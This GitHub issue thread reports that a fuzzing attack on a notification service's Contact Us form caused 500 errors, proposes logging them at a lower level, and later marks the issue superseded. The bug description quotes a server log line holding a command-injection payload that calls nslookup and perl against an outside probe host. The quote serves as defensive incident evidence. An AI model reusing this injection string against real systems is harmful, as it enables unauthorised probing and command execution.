### ISSUE TITLE
Invalid current_step parameter should not trigger a 500 error on the Contact Us form

### ISSUE THREAD

**Issue by yaelberger-commits** [cds-snc/notification-planning#756]
# Describe the bug 

We realized through an [incident](https://docs.google.com/document/d/1PogUvB221LvGPksF6IBbNalICv4gRABDBGU_GqtHPFM/edit) that a 500 error occurs when a user (or bad actor in this case) submits a Contact us form and manipulate the `current_step` parameter. For example, from the CloudWatch logs on 2022/06/08:

```
log": "45.197.133.71 - - [08/Jun/2022:07:51:10 +0000] \"POST /contact?current_step=%26(nslookup%20hitlolepqgkkcf616f.bxss.me%7C%7Cperl%20-e%20\\\"gethostbyname('hitlolepqgkkcf616f.bxss.me')\\\")%26'%5C\\\"`0%26(nslookup%20hitlolepqgkkcf616f.bxss.me%7C%7Cperl%20-e%20\\\"gethostbyname('hitlolepqgkkcf616f.bxss.me')\\\")%26`' HTTP/1.1\" 302 255 \"-\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36\"\n"
```

# [Bug Severity](https://docs.google.com/document/d/1tcD32bjJRaREsMgaUEoXAk400y1dKzzaKR0G5Sr1w20/edit)
(SEV-1, SEV2, SEV3, SEV-4) 

SEV-3: Not having a big impact, but when we got a fuzzing attack, the 500 errors caused alarms to go off that didn't need to. 

# To Reproduce

1. Perform a POST request on the support form with an invalid `current_step` parameter.

# Expected behavior

Catch and log the error at a level other than ERROR (WARN maybe?).

# Impact

Describe overall user/system impact to consider when prioritizing this issue.

If applicable

## Impact on Notify users:

No impact

## Impact on Recipients:

No impact

##  Impact on Notify team: 

Less support tickets and less alarms, more sleep too. 🛌😴

# Additional context

This was raised during a fuzzy attack that triggered many 500 errors on the support form.

**Comment by jimleroyer** [comment]
@yaelberger-commits Just completed the report. 🙇‍♂️

**Comment by yaelberger-commits** [comment]
Hey team! Please [add your planning poker estimate](https://app.zenhub.com/workspaces/Notify-Planning-614b3ad91bc2030015ed22f5/issues/cds-snc/notification-planning/756?planning-poker) with ZenHub @andrewleith @jimleroyer @jzbahrai @sastels

**Comment by whabanks** [comment]
Superseded by: https://app.zenhub.com/workspaces/notify-planning-614b3ad91bc2030015ed22f5/issues/gh/cds-snc/notification-planning/1286. The contact page was refactored and no longer uses query parameters to track state.
